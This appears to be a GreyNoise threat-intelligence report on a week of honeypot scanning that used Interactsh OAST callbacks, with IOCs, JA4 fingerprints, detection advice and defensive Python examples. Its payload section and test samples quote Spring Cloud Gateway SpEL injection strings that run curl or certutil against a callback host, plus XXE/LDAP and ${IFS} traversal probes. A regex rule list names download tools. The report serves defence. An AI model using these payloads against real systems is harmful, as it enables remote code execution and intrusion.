GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-24

GreyNoise observed 9,004 honeypot sessions from 313 unique IP addresses conducting coordinated vulnerability scanning with OAST callback infrastructure between January 17-23, 2026. Analysis identified 425 distinct scanning campaigns leveraging Interactsh OAST services, with anomalous TCP fingerprinting (MSS=65495) indicating custom scanning tooling or modified network stacks across multiple threat actors.
Tags: OAST, MCP, projectdiscovery, interactsh, rce, iocs, detection engineering, cybersecurity

Author: 🔮Orbie✨

Published: January 24, 2026

Overview

GreyNoise sensors captured extensive scanning activity targeting web application vulnerabilities with Out-of-band Application Security Testing (OAST) callback domains embedded in exploit payloads. The activity spanned seven days with peak concentration on January 19 (3,548 sessions from 13 IP addresses), indicating a shift from distributed reconnaissance to focused exploitation attempts.

Fingerprint analysis revealed two distinct infrastructure patterns: standard Linux-based scanning (JA4T: 64240_2-4-8-1-3_1460_7, matched to WSL Ubuntu 22.04 in the JA4 database; this is the common Linux TCP fingerprint, so the match identifies a Linux-family stack rather than WSL specifically) and anomalous TCP configurations (JA4T: 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) whose non-standard Maximum Segment Size values suggest custom tooling or an unusual network path.

OAST domain extraction and decoding produced 5,171 unique callback domains across six Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online), with campaign identifiers revealing 425 separate scanning operations. The top campaign (“nualr”) generated 1,450 unique OAST domains, while the second-largest (“or3ki”) produced 270 domains.

Infrastructure analysis indicates VPS and bulletproof hosting provider concentration, with the top source IP (146.70.116.218, AS9009 M247 Europe SRL, Austria) responsible for 41.8% of all observed sessions.

Temporal Analysis

Date   | Sessions | Unique IPs | Peak Hour Activity       | Notable Patterns
-------|----------|------------|--------------------------|----------------------------------------
Jan 17 | 950      | 156        | 14:00 UTC (212 sessions) | Distributed reconnaissance phase
Jan 18 | 2,991    | 261        | 06:00 UTC (180 sessions) | Activity escalation across multiple IPs
Jan 19 | 3,548    | 13         | 08:00-11:00 UTC          | Concentrated exploitation from AS9009
Jan 20 | 681      | 10         | Sustained throughout day | Post-peak activity continuation
Jan 21 | 246      | 25         | Intermittent bursts      | Campaign wind-down
Jan 22 | 471      | 13         | Low sustained activity   | Residual scanning
Jan 23 | 117      | 13         | Sporadic sessions        | Campaign conclusion

The temporal distribution reveals a classic three-phase pattern: initial distributed reconnaissance (Jan 17), scaling exploitation (Jan 18-19), and sustained lower-volume activity (Jan 20-23). The sharp concentration on January 19 with only 13 source IPs generating 3,548 sessions indicates a transition from broad scanning to focused exploitation infrastructure.

Primary Campaign Analysis

Campaign 1: Spring Cloud Gateway Code Injection (Dominant)

  • Sessions: 2,189+
  • Unique IPs: 177
  • Primary Fingerprint: 65495_2-4-8-1-3_65495_7 + po11nn060000_4ea4093e6290_000000000000_000000000000
  • Secondary Fingerprint: 64240_2-4-8-1-3_1460_7 + po11nn060000_4ea4093e6290_000000000000_000000000000
  • Target Vulnerability: Spring Cloud Gateway Code Injection
  • OAST Provider: All six Interactsh providers
  • Top OAST Campaigns: nualr (1,450 domains), or3ki (270 domains), mmr8b (158 domains)

This campaign accounts for the largest share of observed activity and reflects automated scanning infrastructure: the consistent use of OAST callbacks across exploit attempts indicates tooling designed to confirm successful code execution through out-of-band DNS/HTTP callbacks rather than by inspecting the HTTP response.

Infrastructure Characteristics:

  • Anomalous MSS value (65495) in 2,096 sessions suggests a custom TCP stack or modified scanning tool
  • 232 unique IPs associated with the primary fingerprint cluster
  • Geographic distribution: Austria, Singapore, Malaysia, United Kingdom, France, India, United States
  • ASN concentration: AS9009 (M247 Europe), AS47583, AS55836, AS14061 (DigitalOcean), AS64457, AS51167 (Contabo)

OAST Decoding Analysis:

  • Campaign identifier “nualr”: 1,450 domains from machine_id fa:81:71, PID 1181
  • Campaign identifier “or3ki”: 270 domains from machine_id c8:c1:ba, PID 4854
  • Campaign identifier “mmr8b”: 158 domains from machine_id b3:b3:01, PID 4376

The distinct machine IDs and PIDs indicate at least three separate scanning instances contributing to this campaign, likely coordinated infrastructure or distinct operators using similar tooling.

Campaign 2: Keycloak Open Redirect CVE-2024-8883

  • Sessions: 296
  • Unique IPs: 2-3 distinct
  • Primary Fingerprint: Various (distributed across multiple fingerprints)
  • Target Vulnerability: CVE-2024-8883 (Keycloak Open Redirect)
  • OAST Provider: Primarily oast.site and oast.live

This secondary campaign represents focused exploitation attempts against Keycloak authentication systems. The low IP count (2-3 sources) with 296 sessions indicates high-volume automated scanning from concentrated infrastructure.

Payload Analysis

Payload Type                   | Sessions | Unique IPs | Primary CVE/Technique                                         | OAST Integration
-------------------------------|----------|------------|---------------------------------------------------------------|-----------------------------------------------------
Spring Cloud Gateway Injection | 2,189+   | 177        | Spring Cloud Gateway code injection (SpEL expression in path) | Command injection with callback URLs
Keycloak Open Redirect         | 296      | 2-3        | CVE-2024-8883                                                 | Redirect to OAST domains
Generic Web Crawler            | 9,004    | 313        | N/A                                                           | All sessions also carry the generic web crawler tag

Exploit Pattern Examples:

Spring Cloud Gateway attempts use variations of:

/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("curl http://[OAST-DOMAIN]")}__::.x/
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("certutil -urlcache -split -f http://[OAST-DOMAIN]")}__::.x/

Keycloak exploitation follows redirect patterns:

/realms/master/protocol/openid-connect/auth?redirect_uri=http://[OAST-DOMAIN]

Additional exploitation vectors identified:

  • Command injection: /ddns_check.ccp with curl https://[OAST-DOMAIN] in parameters
  • XML external entity (XXE): /sitecore/shell/ClientBin/Reporting/Report.ashx with LDAP OAST callbacks
  • Directory traversal with command execution: /misc/curl${IFS}[OAST-DOMAIN]/..;/index.html

All payloads share a callback-verification strategy: the injected command or entity reaches out to an attacker-controlled OAST domain, so the scanner can confirm execution from the DNS or HTTP interaction even when the HTTP response reveals nothing (blind injection, asynchronous execution, or filtered output).

Infrastructure Analysis

Fingerprint Clustering

JA4T Fingerprint        | JA4H Fingerprint          | Sessions | Unique IPs | MSS   | Identified OS/Tool
------------------------|---------------------------|----------|------------|-------|-------------------
65495_2-4-8-1-3_65495_7 | po11nn060000_4ea4093e6290 | 2,096    | 232        | 65495 | Custom/Unknown
64240_2-4-8-1-3_1460_7  | po11nn060000_4ea4093e6290 | 1,002    | 188        | 1460  | WSL Ubuntu 22.04
65495_2-4-8-1-3_65495_7 | ge11nn06en00_0e5d97bc8ad6 | 761      | 7          | 65495 | Custom/Unknown
65495_2-4-8-1-3_65495_7 | ge11nn040000_8391bea91fb6 | 471      | 3          | 65495 | Custom/Unknown
65495_2-4-8-1-3_65495_7 | ge11nn040000_532a1ee47909 | 371      | 10         | 65495 | Custom/Unknown

Key Finding: The MSS value of 65495 is highly anomalous. A standard 1500-byte Ethernet MTU produces MSS=1460 (1500 minus 20 bytes of IPv4 header and 20 bytes of TCP header), so 65495 sits 64,035 bytes above the expected value. It is also exactly 65535 minus 40: the MSS a stack advertises when its interface MTU is 65535, the maximum IPv4 packet size. Possible explanations:

  1. Custom network stack modification in the scanning tool
  2. A VPN, tunnel or virtual interface with an oversized MTU in front of the sender (consistent with the 65535 minus 40 arithmetic)
  3. Deliberately anomalous fingerprinting to avoid detection signatures

This fingerprint cluster accounts for 4,012 sessions (44.6% of total activity) and appears across 215 unique JA4T+JA4H combinations, indicating either a single widely-deployed tool or multiple tools sharing similar TCP stack configurations.
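To make the MSS reasoning above checkable, here is an added Python example (written for this page, not GreyNoise tooling) that parses JA4T strings into their four fields, names the TCP option kinds, derives the MTU an MSS implies, and buckets sessions by that MTU. It assumes the JA4T layout window_options_mss_wscale with IANA option numbers and treats a field of "00" as an absent option; the log lines are constructed, with documentation-range addresses standing in for sources.

```python
"""Parse JA4T TCP fingerprints and classify the advertised MSS.

JA4T layout: <window size>_<TCP option kinds, dash-separated>_<MSS>_<window scale>.
Option kinds use IANA numbers: 1 NOP, 2 MSS, 3 window scale, 4 SACK permitted, 8 timestamps.
Assumption made here: a field of "00" means the option was absent.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

IP_TCP_HEADERS = 40                      # 20-byte IPv4 header + 20-byte TCP header, no options
ETHERNET_MSS = 1500 - IP_TCP_HEADERS     # 1460
IPV4_MAX_MTU = 65535
TCP_OPTION_NAMES = {1: "NOP", 2: "MSS", 3: "WSCALE", 4: "SACKOK", 8: "TIMESTAMP"}


@dataclass(frozen=True)
class JA4T:
    window: int
    options: Tuple[int, ...]
    mss: int
    wscale: int

    @property
    def option_names(self) -> List[str]:
        return [TCP_OPTION_NAMES.get(k, f"opt{k}") for k in self.options]

    @property
    def implied_mtu(self) -> Optional[int]:
        return self.mss + IP_TCP_HEADERS if self.mss else None

    @property
    def window_mss_ratio(self) -> Optional[float]:
        """Initial window in segments; Linux with MSS 1460 advertises 64240 = 44 segments."""
        return round(self.window / self.mss, 2) if self.mss else None


def parse_ja4t(fp: str) -> JA4T:
    parts = fp.strip().split("_")
    if len(parts) != 4:
        raise ValueError(f"malformed JA4T: {fp!r}")
    window, opts, mss, wscale = parts
    options = tuple(int(k) for k in opts.split("-")) if opts not in ("", "00") else ()
    return JA4T(int(window), options, int(mss), int(wscale))


def assess_mss(mss: int) -> str:
    """Bucket an MSS value by the path MTU it implies."""
    if mss == 0:
        return "mss_absent"
    if mss == ETHERNET_MSS:
        return "ethernet_1500"
    if mss < ETHERNET_MSS:
        return "reduced_path_mtu"        # PPPoE, IPsec/WireGuard, GRE and similar overhead
    if mss + IP_TCP_HEADERS == IPV4_MAX_MTU:
        return "ipv4_max_mtu"            # 65495: interface MTU 65535, tunnel/virtual NIC or modified stack
    return "above_ethernet"              # jumbo frames or other virtual interface sizes


def summarize(log_lines: List[str]) -> Dict[str, Tuple[int, List[str]]]:
    """Group '<src_ip> <ja4t>' records by MSS bucket: (session count, sorted unique source IPs)."""
    sessions: Dict[str, int] = {}
    ips: Dict[str, set] = {}
    for line in log_lines:
        src, fp = line.split()
        bucket = assess_mss(parse_ja4t(fp).mss)
        sessions[bucket] = sessions.get(bucket, 0) + 1
        ips.setdefault(bucket, set()).add(src)
    return {b: (sessions[b], sorted(ips[b])) for b in sessions}


# Constructed sample: one SYN per line, using the fingerprints from the report plus one
# reduced-MSS client; 192.0.2.0/24 is documentation address space, not a real source.
SAMPLE_LOG = [
    "192.0.2.10 65495_2-4-8-1-3_65495_7",
    "192.0.2.10 65495_2-4-8-1-3_65495_7",
    "192.0.2.11 33280_2-4-8-1-3_65495_7",
    "192.0.2.12 64240_2-4-8-1-3_1460_7",
    "192.0.2.13 65535_2-1-3-1-1-4_1452_6",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        src, fp = line.split()
        t = parse_ja4t(fp)
        print(src, fp, t.option_names, "mtu", t.implied_mtu, "win/mss", t.window_mss_ratio, assess_mss(t.mss))
    print(summarize(SAMPLE_LOG))
```

Bucketing on the MSS field rather than on the whole fingerprint string is deliberate: it groups 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7 together, which is the property the Key Finding is actually about.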

ASN Distribution

ASN      | Organization               | Country       | Sessions | Top IP          | Fingerprint Pattern
---------|----------------------------|---------------|----------|-----------------|--------------------
AS9009   | M247 Europe SRL            | Austria       | 3,766    | 146.70.116.218  | MSS=65495 dominant
AS200019 | ALEXHOST SRL               | Moldova       | 560      | 193.233.202.173 | MSS=65495
AS27176  | DataWagon LLC              | United States | 488      | 103.60.12.224   | MSS=1460
AS150654 | Kennies Star India Pvt Ltd | India         | 444      | 38.225.206.91   | Mixed
AS51167  | Contabo GmbH               | France/UK     | 447      | Multiple        | MSS=65495 and 1460
AS14061  | DigitalOcean LLC           | Singapore/US  | 297      | Multiple        | MSS=65495 and 1460

Infrastructure is heavily concentrated in VPS and bulletproof hosting providers. AS9009 (M247 Europe) accounts for 41.8% of all sessions from a single IP address (146.70.116.218), active January 19-20 with 3,766 sessions over 27 hours.

Attribution Assessment

Confidence: Medium

Evidence for coordinated operations:

  • 425 distinct OAST campaign identifiers decoded from callback domains
  • Consistent targeting of Spring Cloud Gateway across multiple fingerprint clusters
  • Shared OAST provider infrastructure (Interactsh) across campaigns
  • Temporal clustering suggests campaign coordination or shared tasking

Evidence for distinct operators:

  • Wide variance in JA4T+JA4H fingerprint combinations (215 unique pairings)
  • Different machine IDs in OAST decoded data (indicating separate scanning instances)
  • Geographic and ASN distribution suggests distributed infrastructure rather than single operator
  • Mixed use of standard Linux fingerprints (WSL Ubuntu) and anomalous TCP stacks

Assessment:

This activity likely represents multiple threat actors or scanning operations using similar tooling (likely Interactsh-based vulnerability scanners). Interactsh is the OAST backend that ProjectDiscovery's nuclei scanner uses for its out-of-band checks, so nuclei templates run from disposable VPS hosts are the simplest explanation for the payload and provider mix, though the honeypot data does not identify the client. The anomalous MSS=65495 fingerprint may indicate a specific commercial or open-source scanning tool with custom network configuration, deployed by multiple operators. The concentration in VPS/bulletproof hosting infrastructure is consistent with opportunistic scanning campaigns rather than targeted intrusions.

The decoded OAST campaign identifiers suggest at least 425 separate scanning instances, though many may be retrying operations or parallel scanning from the same infrastructure. The top three campaigns (nualr, or3ki, mmr8b) account for 1,878 domains (36.3% of decoded OAST callbacks) and likely represent the most active operators.

Network IOCs

Primary Source IPs (top 10 by session count)

IP Address      | Country        | ASN      | Organization               | Sessions | First Seen       | Last Seen
----------------|----------------|----------|----------------------------|----------|------------------|-----------------
146.70.116.218  | Austria        | AS9009   | M247 Europe SRL            | 3,766    | 2026-01-19 08:39 | 2026-01-20 11:37
193.233.202.173 | Moldova        | AS200019 | ALEXHOST SRL               | 560      | 2026-01-17 05:00 | 2026-01-22 05:27
103.60.12.224   | United States  | AS27176  | DataWagon LLC              | 488      | 2026-01-18 07:13 | 2026-01-18 07:15
38.225.206.91   | India          | AS150654 | Kennies Star India Pvt Ltd | 444      | 2026-01-22 05:58 | 2026-01-22 17:58
37.60.230.90    | France         | AS51167  | Contabo GmbH               | 378      | 2026-01-17 18:35 | 2026-01-20 00:18
34.19.112.35    | United States  | AS396982 | Google LLC                 | 179      | 2026-01-19 22:32 | 2026-01-20 05:26
129.212.209.250 | Singapore      | AS14061  | DigitalOcean LLC           | 98       | 2026-01-17 19:47 | 2026-01-21 22:04
149.102.131.223 | United Kingdom | AS51167  | Contabo GmbH               | 69       | 2026-01-19 21:23 | 2026-01-20 09:24
168.107.59.85   | South Korea    | AS31898  | Oracle Corporation         | 66       | 2026-01-23 09:05 | 2026-01-23 09:12
216.106.186.24  | United States  | AS63023  | GTHost                     | 62       | 2026-01-18 13:23 | 2026-01-20 18:05

OAST Providers and Campaign Identifiers

Interactsh Provider Distribution:

  • oast.site: 2,190 domains (42.3%)
  • oast.live: 857 domains (16.6%)
  • oast.me: 705 domains (13.6%)
  • oast.pro: 517 domains (10.0%)
  • oast.fun: 478 domains (9.2%)
  • oast.online: 424 domains (8.2%)

Top OAST Campaign Identifiers:

  1. nualr - 1,450 domains (machine_id: fa:81:71, PID: 1181)
  2. or3ki - 270 domains (machine_id: c8:c1:ba, PID: 4854)
  3. mmr8b - 158 domains (machine_id: b3:b3:01, PID: 4376)
  4. djnqr - 147 domains (machine_id: b3:be:b7, PID: 23985)
  5. umr8b - 102 domains (machine_id: eb:b3:01, PID: 4396)

Note: 5,171 unique OAST domains decoded across 425 total campaign identifiers.
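The machine_id and PID fields reported here (and in the OAST Decoding Analysis above) fall out of the structure of the Interactsh correlation ID, so the decoding is reproducible without GreyNoise tooling. The Interactsh client builds each callback host as <correlation ID><nonce>.<provider>, and the correlation ID is an xid: 12 bytes (4-byte big-endian Unix timestamp, 3-byte machine ID, 2-byte PID, 3-byte counter) rendered as 20 lowercase base32hex characters. The Python below is an added example written for this page, not GreyNoise or ProjectDiscovery code; it assumes Interactsh's default lengths (20-character correlation ID, 13-character nonce) and the six public providers named in the report. The sample hosts are constructed: they reuse the machine ID and PID of the "nualr" and "or3ki" entries for illustration, with made-up timestamps, counters and nonces. The check against a published xid sample value is what shows the decoder is right.

```python
"""Decode Interactsh correlation IDs out of OAST callback hostnames.

Host layout assumed (Interactsh client defaults): <20-char correlation ID><13-char nonce>.<provider>
The correlation ID is an xid: 12 bytes = 4-byte big-endian Unix time | 3-byte machine ID |
2-byte PID | 3-byte counter, encoded as 20 lowercase base32hex characters (100 bits, last 4 are padding).
"""
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

XID_ALPHABET = "0123456789abcdefghijklmnopqrstuv"
CORRELATION_ID_LEN = 20
INTERACTSH_PROVIDERS = ("oast.site", "oast.live", "oast.me", "oast.pro", "oast.fun", "oast.online")


def xid_decode(cid: str) -> Dict[str, object]:
    """Split a 20-character xid string into timestamp, machine ID, PID and counter."""
    if len(cid) != CORRELATION_ID_LEN or any(c not in XID_ALPHABET for c in cid):
        raise ValueError(f"not an xid string: {cid!r}")
    n = 0
    for c in cid:
        n = (n << 5) | XID_ALPHABET.index(c)
    raw = (n >> 4).to_bytes(12, "big")           # drop the 4 padding bits
    ts = int.from_bytes(raw[0:4], "big")
    return {
        "timestamp": ts,
        "time_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "machine_id": ":".join(f"{b:02x}" for b in raw[4:7]),
        "pid": int.from_bytes(raw[7:9], "big"),
        "counter": int.from_bytes(raw[9:12], "big"),
    }


def xid_encode(ts: int, machine_id: bytes, pid: int, counter: int) -> str:
    """Inverse of xid_decode; used here only to build constructed sample hosts."""
    raw = ts.to_bytes(4, "big") + machine_id + pid.to_bytes(2, "big") + counter.to_bytes(3, "big")
    n = int.from_bytes(raw, "big") << 4            # 96 data bits + 4 padding bits = 20 symbols
    return "".join(XID_ALPHABET[(n >> (5 * (19 - i))) & 31] for i in range(20))


def decode_oast_host(host: str) -> Optional[Dict[str, object]]:
    """Return decoded fields for a public-Interactsh host, or None if the host is not one."""
    host = host.lower().rstrip(".")
    for provider in INTERACTSH_PROVIDERS:
        if not host.endswith("." + provider):
            continue
        label = host[: -len(provider) - 1].split(".")[-1]   # label directly under the provider
        if len(label) < CORRELATION_ID_LEN:
            return None
        try:
            fields = xid_decode(label[:CORRELATION_ID_LEN])
        except ValueError:
            return None
        fields.update(provider=provider, correlation_id=label[:CORRELATION_ID_LEN],
                      nonce=label[CORRELATION_ID_LEN:])
        return fields
    return None


def group_by_instance(hosts: List[str]) -> Dict[Tuple[str, int], int]:
    """Count callback hosts per (machine ID, PID): one scanner process per key."""
    counts: Dict[Tuple[str, int], int] = {}
    for h in hosts:
        f = decode_oast_host(h)
        if f is not None:
            key = (str(f["machine_id"]), int(f["pid"]))
            counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed samples: machine ID fa:81:71 / PID 1181 and c8:c1:ba / PID 4854 mirror the
# report's entries; the timestamps (2026-01-19 08:39 UTC), counters and nonces are made up.
SAMPLE_CID = xid_encode(1768811940, bytes.fromhex("fa8171"), 1181, 1)
SAMPLE_HOST = f"{SAMPLE_CID}abcdefghijklm.oast.site"
SAMPLE_HOSTS = [
    SAMPLE_HOST,
    f"{xid_encode(1768811941, bytes.fromhex('fa8171'), 1181, 2)}nopqrstuvwxyz.oast.live",
    f"{xid_encode(1768811950, bytes.fromhex('c8c1ba'), 4854, 1)}abcdefghijklm.oast.me",
    "www.example.com",
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        print(h, "->", decode_oast_host(h))
    print(group_by_instance(SAMPLE_HOSTS))
```

Grouping on (machine ID, PID) is what turns thousands of throwaway hostnames into a handful of scanner processes, and the embedded timestamp tells you when that process started, which is often earlier than the first honeypot hit. A self-hosted Interactsh server uses whatever domain the operator owns, so extend INTERACTSH_PROVIDERS with any such domains you observe.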

JA4 Fingerprints for Detection

High-Confidence Malicious Fingerprints:

JA4T (TCP):

65495_2-4-8-1-3_65495_7  # Anomalous MSS - 4,012 sessions
33280_2-4-8-1-3_65495_7  # Anomalous MSS - 279 sessions
64240_2-4-8-1-3_1460_7   # Standard MSS but high volume - 1,385 sessions

JA4H (HTTP) - Top Patterns:

po11nn060000_4ea4093e6290_*  # 3,377 sessions
ge11nn06en00_0e5d97bc8ad6_*  # 917 sessions
ge11nn040000_8391bea91fb6_*  # 471 sessions
ge11nn040000_532a1ee47909_*  # 371 sessions

Combined JA4T+JA4H pairs provide highest fidelity for detection (see Infrastructure Analysis table above for top combinations).

Detection Recommendations

  1. Block or alert on the source IPs listed in the Network IOCs section. Treat the ASNs (AS9009, AS200019, AS27176, AS150654) as enrichment rather than a block criterion, since they are shared hosting providers: alert when traffic from them also carries OAST callback patterns.

  2. Monitor for JA4T fingerprints with MSS=65495 - this value (65535 minus the 40 bytes of IPv4 and TCP headers) is rare in legitimate traffic and strongly correlated with scanning activity in this dataset. Alert on SYNs advertising this MSS (the third JA4T field) rather than only on the full fingerprint string, so that variants with a different window size, such as 33280_2-4-8-1-3_65495_7, are caught as well.

  3. Implement JA4 fingerprint-based detection rules for the top 5 JA4T+JA4H combinations listed in Infrastructure Analysis. These fingerprints account for 4,701 sessions (52.2% of total activity).

  4. Prioritize patching Spring Cloud Gateway vulnerabilities - this framework represents the primary target across observed campaigns. Organizations running Spring Cloud Gateway should audit versions and apply available security updates.

  5. Patch Keycloak CVE-2024-8883 if using affected versions - while lower volume, this vulnerability was actively scanned and represents a viable attack vector for authentication bypass.

  6. Implement DNS monitoring for Interactsh OAST domains - all six public Interactsh providers (oast.site, oast.live, oast.me, oast.pro, oast.fun, oast.online) were observed. Outbound DNS queries or HTTP connections to these domains from internal infrastructure indicate potential successful exploitation, once your own authorized testing is excluded (nuclei and interactsh-client use the same domains). Self-hosted Interactsh servers use arbitrary domains and will not match this list, so pair the watchlist with alerting on unexpected outbound DNS and HTTP from application servers.

  7. WAF rules for OAST callback patterns - implement detection for URL-encoded OAST domain patterns in HTTP parameters, particularly in Spring Cloud Gateway endpoints (/hystrix/*) and authentication flows.

  8. Alert on command injection payloads with curl, certutil, wget, or similar download utilities followed by external domain names in web request parameters.

  9. Monitor for LDAP OAST callback attempts - some payloads use LDAP protocol for out-of-band callbacks (ldap://[OAST-DOMAIN]/), particularly in XXE exploitation attempts.

  10. Implement rate limiting on vulnerable endpoints - a single source generated 3,766 sessions in about 27 hours. Honeypots deliberately accept that volume; production endpoints should cut a source off well before it, which also caps the number of payload variants an attacker can try per host.
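Recommendations 7 through 9 can be expressed as one request-inspection routine. The Python below is an added example for this page (not GreyNoise tooling or a vendor WAF rule): it percent-decodes each request, extracts any public Interactsh hostname, and tags the injection primitives the observed payloads rely on (a download utility followed by a host, the ${IFS} separator, an ldap:// callback, a SpEL T(java...) type reference, and the /..;/ traversal). The request samples are constructed from the patterns quoted in the Payload Analysis section with a made-up 33-character callback label; the rule names and severity scale are this example's own.

```python
"""Tag HTTP requests that carry Interactsh OAST callbacks or the injection primitives
seen with them. Works on raw request text (request line, headers, body); no network access."""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

INTERACTSH_TLDS = ("site", "live", "me", "pro", "fun", "online")
OAST_HOST_RE = re.compile(
    r"[a-z0-9-]+(?:\.[a-z0-9-]+)*\.oast\.(?:" + "|".join(INTERACTSH_TLDS) + r")\b", re.I)

# Rule name -> regex run against the percent-decoded request text.
RULES = {
    # download utility followed (within 120 chars) by something that looks like a hostname
    "download_utility": re.compile(
        r"\b(?:curl|wget|certutil|bitsadmin)\b.{0,120}?[a-z0-9-]+(?:\.[a-z0-9-]+)+", re.I | re.S),
    "shell_ifs_separator": re.compile(r"\$\{IFS\}"),
    "ldap_callback": re.compile(r"\bldaps?://", re.I),
    "spel_type_reference": re.compile(r"\bT\s*\(\s*java\."),
    "path_traversal_semicolon": re.compile(r"/\.\.;/"),
}


def normalize(raw: str) -> str:
    """Two decode passes cover single and double percent-encoding (%253A -> %3A -> ':')."""
    return unquote(unquote(raw))


def analyze_request(raw: str) -> Dict[str, object]:
    text = normalize(raw)
    domains: List[str] = []
    for m in OAST_HOST_RE.finditer(text):
        host = m.group(0).lower()
        if host not in domains:
            domains.append(host)
    rules = [name for name, rx in RULES.items() if rx.search(text)]
    if domains:
        rules.insert(0, "oast_callback_domain")
    if domains and len(rules) > 1:
        severity = "high"        # callback target plus an injection primitive: exploitation attempt
    elif domains or rules:
        severity = "medium"      # e.g. an open-redirect probe pointing at an OAST host
    else:
        severity = "none"
    return {"severity": severity, "rules": rules, "oast_domains": domains}


def scan(requests: List[str]) -> List[Tuple[int, Dict[str, object]]]:
    """Return (index, findings) for every request that triggered at least one rule."""
    hits = []
    for i, raw in enumerate(requests):
        findings = analyze_request(raw)
        if findings["rules"]:
            hits.append((i, findings))
    return hits


# Constructed samples built from the request patterns quoted in the report; CB is a made-up
# 33-character Interactsh label (20-char correlation ID + 13-char nonce).
CB = "cgv3rf2ql7dbp1hs2ag0abcdefghijklm"
SAMPLE_REQUESTS = [
    f'GET /hystrix/;a=a/__${{T (java.lang.Runtime).getRuntime().exec("curl http://{CB}.oast.site")}}__::.x/ HTTP/1.1',
    f"GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=http%3A%2F%2F{CB}.oast.live%2F HTTP/1.1",
    f"GET /misc/curl${{IFS}}{CB}.oast.me/..;/index.html HTTP/1.1",
    "POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\r\nContent-Type: text/xml\r\n\r\n"
    f'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "ldap://{CB}.oast.pro/a">]><r>&x;</r>',
    "GET /index.html HTTP/1.1",
    "GET /blog/curling-tips?ref=example.com HTTP/1.1",
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_REQUESTS):
        print(i, findings["severity"], findings["rules"], findings["oast_domains"])
```

The host pattern only matches the six public providers; a self-hosted Interactsh server uses any domain the operator owns, so this belongs alongside the DNS-egress monitoring in recommendation 6, not in place of it. The Keycloak sample scores medium on purpose: a redirect_uri pointing at an OAST host is a probe, and it only becomes evidence of a vulnerable deployment if the server actually issues the redirect.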

GNQL Queries

Investigate similar activity in GreyNoise:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d
tags:"Generic Contains Well-known Out-of-band Interaction Domain" last_seen:7d
tags:"Spring Cloud Gateway Code Injection Attempt" last_seen:7d
metadata.asn:AS9009 last_seen:7d
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Contains Well-known Out-of-band Interaction Domain"
metadata.asn:(AS9009 OR AS200019 OR AS27176 OR AS150654) tags:"Generic Contains Well-known Out-of-band Interaction Domain"
raw_data.ja4_fingerprints.ja4t:65495_2-4-8-1-3_65495_7
tags:"Keycloak Open Redirect CVE-2024-8883 Check" last_seen:30d

Analysis Period: January 17-23, 2026 (7 days)
Data Source: GreyNoise Global Observation Grid
Total Sessions: 9,004
Unique Source IPs: 313
Decoded OAST Domains: 5,171